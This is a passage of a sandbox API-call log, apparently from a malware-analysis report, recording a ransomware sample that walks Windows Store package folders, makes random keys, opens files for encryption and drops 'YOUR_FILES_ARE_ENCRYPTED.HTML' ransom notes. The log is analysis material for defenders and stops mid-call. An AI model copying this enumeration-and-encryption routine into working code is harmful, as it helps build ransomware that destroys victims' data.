lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1cef5ca8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9bd630c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x311bec0, dwReserved1=0x62f340, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.746] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.746] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 176 [0120.746] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.746] lstrlenW (lpString=".dat") returned 4 [0120.746] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.746] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\microsoft.windowsstore_2015.10.13.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0120.746] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=131072) returned 1 [0120.747] GetProcessHeap () returned 0x600000 [0120.747] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.750] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="57") returned 2 [0120.750] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="E2") returned 2 [0120.750] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="BD") returned 2 [0120.750] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="85") returned 2 [0120.750] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="90") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="5F") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="95") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="FB") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="0D") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="33") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="95") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="8D") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="52") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="70") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="AF") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="B0") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="E5") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="92") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="F4") returned 2 [0120.750] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="68") returned 2 [0120.750] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="DC") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="E4") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="E3") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="7F") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="82") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="96") returned 2 [0120.750] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="79") returned 2 [0120.750] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="10") returned 2 [0120.750] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="FB") returned 2 [0120.751] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="F7") returned 2 [0120.751] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="79") returned 2 [0120.751] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="10") returned 2 [0120.751] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.751] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.751] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.751] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x97f6443, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x97f6443, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f340, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.751] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.751] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 181 [0120.751] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.751] lstrlenW (lpString=".LOG1") returned 5 [0120.751] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.751] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x97f6443, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x97f6443, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f340, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.751] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.751] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 181 [0120.752] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.752] lstrlenW (lpString=".LOG2") returned 5 [0120.752] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.752] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x97f6443, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x97f6443, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f340, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.752] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.752] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 186 [0120.752] GetProcessHeap () returned 0x600000 [0120.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\microsoft.windowsstore_2015.10.13.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.753] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.754] CloseHandle (hObject=0x320) returned 1 [0120.754] GetProcessHeap () returned 0x600000 [0120.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.754] GetProcessHeap () returned 0x600000 [0120.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.754] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.754] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.754] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 170 [0120.754] GetProcessHeap () returned 0x600000 [0120.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\microsoft.windowsstore_2015.10.13.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.756] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.757] CloseHandle (hObject=0x324) returned 1 [0120.757] GetProcessHeap () returned 0x600000 [0120.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.757] GetProcessHeap () returned 0x600000 [0120.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.759] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.759] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.759] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState") returned 98 [0120.759] GetProcessHeap () returned 0x600000 [0120.759] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.759] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState" [0120.759] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\*" [0120.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.760] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.760] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 0 [0120.760] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.760] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.760] GetProcessHeap () returned 0x600000 [0120.760] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.761] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.762] CloseHandle (hObject=0x324) returned 1 [0120.763] GetProcessHeap () returned 0x600000 [0120.763] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.763] GetProcessHeap () returned 0x600000 [0120.763] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.763] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.763] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.763] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings") returned 94 [0120.763] GetProcessHeap () returned 0x600000 [0120.763] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.763] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings" [0120.763] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\*" [0120.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.763] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.763] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.763] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.763] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 107 [0120.763] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.763] lstrlenW (lpString=".lock") returned 5 [0120.763] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.763] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.763] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.763] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat") returned 107 [0120.763] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.763] lstrlenW (lpString=".dat") returned 4 [0120.763] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.763] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.764] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.764] GetProcessHeap () returned 0x600000 [0120.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0120.767] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F6") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="AA") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F7") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="26") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="58") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B6") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="40") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="13") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E4") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="5E") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="1B") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="98") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="DF") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="82") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="A1") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="5E") returned 2 [0120.767] wsprintfW (in: 